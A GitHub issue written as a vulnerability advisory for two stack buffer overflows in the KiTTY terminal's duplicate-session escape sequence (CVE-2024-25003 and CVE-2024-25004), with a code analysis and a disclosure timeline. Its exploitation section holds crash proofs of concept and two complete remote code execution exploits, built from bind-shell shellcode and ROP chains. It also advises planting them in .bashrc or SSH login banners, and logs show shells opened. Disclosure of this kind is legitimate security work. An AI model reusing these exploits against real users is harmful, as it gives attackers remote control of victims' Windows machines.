Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables #525

Open
DEFCESCO opened this issue Feb 7, 2024 · 0 comments

Comments

@DEFCESCO
Copy link

DEFCESCO commented Feb 7, 2024

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables

Contents:

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:

Austin A. DeFrancesco (DEFCESCO) discovered two stack-based buffer overflow vulnerabilities in KiTTY (https://github.com/cyd01/KiTTY/). These vulnerabilities:

  • Are exploitable by any KiTTY user connecting to a host with the embedded exploit;
  • The vulnerabilities were introduced in the original release in May 2021 (commit 4f79b1e) and affect all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.

Austin developed an exploit for these vulnerabilities and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. These exploits are stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.

Analysis:

CVE-2024-25003 and CVE-2024-25004 buffer overflow vulnerabilities are in kitty.c. The vulnerable lines of code are on lines 2597-2602; in the latest revision 75fa2abcd220c172 (

KiTTY/kitty.c

Lines 2597 to 2602 in 75fa2ab

char host[1024]="";char user[256]="";
int i;
if( RemotePath!= NULL ) free( RemotePath ) ;
RemotePath = (char*) malloc( strlen( cmd ) - 2 ) ;
strcpy(host,cmd+3);i=poss(":",host);
strcpy(user,host+i);
).

If KiTTY encounters the ANSI escape sequence \033]0;__dt in a stream, it interprets it as an instruction to create a duplicate terminal session:

  • \033: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
  • ]0;: This sequence part indicates a metacommand will be defined.
  • __dt: This is the vulnerable KiTTY command to duplicate the terminal, which takes inputs of hostname and username.
  • \077: This is the terminator sequence to indicate the end of the escape sequence.
  • KiTTY’s kitty.c __dt command checks if the first three characters of the string cmd are d, t, and :, respectively.

If the condition is true (at line 2596), an array host and user will be declared with a size of 1024 and 256 (at line 2597), respectively, and initialized with an empty string.

CVE-2024-25003, where the hostname is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.

CVE-2024-25004, where the username is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.

Because RemotePath is created from a size calculated at runtime, RemotePath is not vulnerable to an overflow. It should be noted that RemotePath may be a NULL pointer if the allocation fails.

  1. strcpy(host, cmd + 3); copies the substring of cmd starting from the 4th character (index 3) into the host array (at line 2601).
  2. i = poss(":", host); assumes there’s a function poss that finds the position of the : character in the host string and assigns it to the variable i (at line 2601).
  3. strcpy(user, host + i); copies the substring of host starting from the position after : into the user array (at line 2602).

2596 if( (cmd[0]=='d')&&(cmd[1]=='t')&&(cmd[2]==':') ) { // __dt: start a duplicated session in same directory, same host and same user : dt() { printf "\033]0;__dt:"$(hostname)":"${USER}":"pwd"\007" ; }
2597 char host[1024]="";char user[256]="";
2598 int i;
2599 if( RemotePath!= NULL ) free( RemotePath ) ;
2600 RemotePath = (char*) malloc( strlen( cmd ) - 2 ) ;
2601 strcpy(host,cmd+3);i=poss(":",host);
2602 strcpy(user,host+i);


Exploitation:

__dt Hostname & Username Buffer Overflows:

From an attacker’s point of view, the exploits for CVE-2024-25003 and CVE-2024-25004 can be inserted into the .bashrc file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit(s) will trigger once the user logs in or is presented with the SSH warning/MOTD banner.

HOSTNAME CRASH:
(47c.23ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=861615a9 edx=01130000 esi=41414141 edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
41414141 ??              ???
USERNAME CRASH:
(af8.ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=02f92491 edx=01120000 esi=41414141 edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
41414141 ??              ???

KiTTY’s __dt function crashed (at line 2601) because adjacent memory was overwritten.

To reproduce the vulnerability, follow these steps:

  1. Start KiTTY and start an SSH session.
  2. Save the proof of concept (PoC) on the connected SSH session.
  3. Execute the PoC(s) using Python: python3 developer_CVE-2024-25003.py or python3 developer_CVE-2024-25004.
#!/usr/bin/python

#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start               #
#        Duplicated Session Hostname Variable (CVE-2024-25003)                        #
# OS: Microsoft Windows 11/10/8/7/XP                                                  #
# Author: DEFCESCO (Austin A. DeFrancesco)                                            #
# Software:                                                                           #
# https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip #
#-------------------------------------------------------------------------------------#

import sys
import os

sequence = b'A' * 1309 

escape_sequence = b'\033]0;__dt:' + sequence + b'\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python

#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start               #
#        Duplicated Session Username Variable (CVE-2024-25004)                        #
# OS: Microsoft Windows 11/10/8/7/XP                                                  #
# Author: DEFCESCO (Austin A. DeFrancesco)                                            #
# Software:                                                                           #
# https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip #
#-------------------------------------------------------------------------------------#

import sys
import os

sequence = b'A' * 1309 

escape_sequence = b'\033]0;__dt:localhost:' + sequence + b'\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()

Exploits:

To reproduce these exploits, follow these steps:

  1. Start KiTTY and start an SSH session.
  2. Save the proof of concept exploit(s) on the connected SSH session.
  3. Update the payload handler and payload documented in the exploit’s comments.
  4. Execute the exploit(s) using Python: python3 CVE-2024-25003.py or python3 CVE-2024-25004.py.
#!/usr/bin/python

#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start             #
#        Duplicated Session Hostname Variable (CVE-2024-25003)                        #
# OS: Microsoft Windows 11/10/8/7/XP                                                  #
# Author: DEFCESCO (Austin A. DeFrancesco)                                            #
# Software:                                                                           #
# https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip #
#-------------------------------------------------------------------------------------#
# More details can be found on my blog: https://blog.DEFCESCO.io/Hell0+KiTTY          #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   # 
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
# windows/shell_bind_tcp - 375 bytes                                                          #
# https://metasploit.com/                                                                     #
# Encoder: x86/xor_poly                                                                       #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
# AutoVerifySession=true                                                                      #
#---------------------------------------------------------------------------------------------#

buf =  b""
buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
buf += b"\xf2\x3b\x21"

def shellcode():
	sc = b''
	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
	sc += b'\x29\xD8'             # sub    eax,ebx
	sc += b'\x29\xC4'             # sub    esp,eax
	sc += buf
	sc += b'\x90' * (1052-len(sc))
	assert len(sc) == 1052 
	return sc

def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = [
	#[---INFO:gadgets_to_set_esi:---]
	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
	#[---INFO:gadgets_to_set_ebp:---]
	0x00429953,  # POP EBP # RETN [kitty.exe]
	0x005405b0, # push esp; ret 0 [kitty.exe]
	#[---INFO:gadgets_to_set_ebx:---]
	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
	0x00000201,  # 0x00000201-> ebx
	#[---INFO:gadgets_to_set_edx:---]
	0x00430dce,  # POP EDX # RETN [kitty.exe]
	0x00000040,  # 0x00000040-> edx
	#[---INFO:gadgets_to_set_ecx:---]
	0x005ac58c,  # POP ECX # RETN [kitty.exe]
	0x004d81d9,  # &Writable location [kitty.exe]
	#[---INFO:gadgets_to_set_edi:---]
	0x004fa404,  # POP EDI # RETN [kitty.exe]
	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
	#[---INFO:gadgets_to_set_eax:---]
	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
	0x90909090,  # nop
	0x41414141,  # Filler (compensate)
	#[---INFO:pushad:---]
	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
	]
	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40                                       #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
#   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
# Shellcode size at ESP: 1052                                                      #
#----------------------------------------------------------------------------------#

return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}

rop_chain_padding = b'\x90' * 35 
nops = b'\x90' * 88

escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\x90'
escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python

#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start             #
#        Duplicated Session Username Variable (CVE-2024-25004)                        #
# OS: Microsoft Windows 11/10/8/7/XP                                                  #
# Author: DEFCESCO (Austin A. DeFrancesco)                                            #
# Software:                                                                           #
# https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip #
#-------------------------------------------------------------------------------------#
# More details can be found on my blog: https://blog.DEFCESCO.io/Hell0+KiTTY          #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   # 
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes                                                  #
# https://metasploit.com/                                                             #
# Encoder: x86/shikata_ga_nai                                                         #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
# AutoVerifySession=true                                                              #
#-------------------------------------------------------------------------------------#

buf =  b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"

def shellcode():
	sc = b'' 
	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
	sc += b'\x29\xD8'             # sub    eax,ebx
	sc += b'\x29\xC4'             # sub    esp,eax
	sc += buf
	sc += b'\x90' * (1042-len(sc))
	assert len(sc) == 1042 
	return sc

def create_rop_chain():
	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = [
	#[---INFO:gadgets_to_set_esi:---]
	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
	#[---INFO:gadgets_to_set_ebp:---]
	0x00429953,  # POP EBP # RETN [kitty.exe]
	0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
	#[---INFO:gadgets_to_set_ebx:---]
	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
	0x00000201,  # 0x00000201-> ebx
	#[---INFO:gadgets_to_set_edx:---]
	0x00430dce,  # POP EDX # RETN [kitty.exe]
	0x00000040,  # 0x00000040-> edx
	#[---INFO:gadgets_to_set_ecx:---]
	0x005ac58c,  # POP ECX # RETN [kitty.exe]
	0x004d81d9,  # &Writable location [kitty.exe]
	#[---INFO:gadgets_to_set_edi:---]
	0x004fa404,  # POP EDI # RETN [kitty.exe]
	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
	#[---INFO:gadgets_to_set_eax:---]
	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
	0x90909090,  # nop
	0x41414141,  # Filler (compensate)
	#[---INFO:pushad:---]
	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
	]
	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
#   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
# Shellcode size at ESP: 1042 bytes                                                #
#----------------------------------------------------------------------------------#

return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}

rop_chain_padding = b'\x90' * 27
nops = b'\x90' * 88

escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()

Acknowledgments:

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.

Timeline:

2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).

Additional Advisory:

CVE-2024-23749 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input: https://blog.defcesco.io/CVE-2024-23749

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant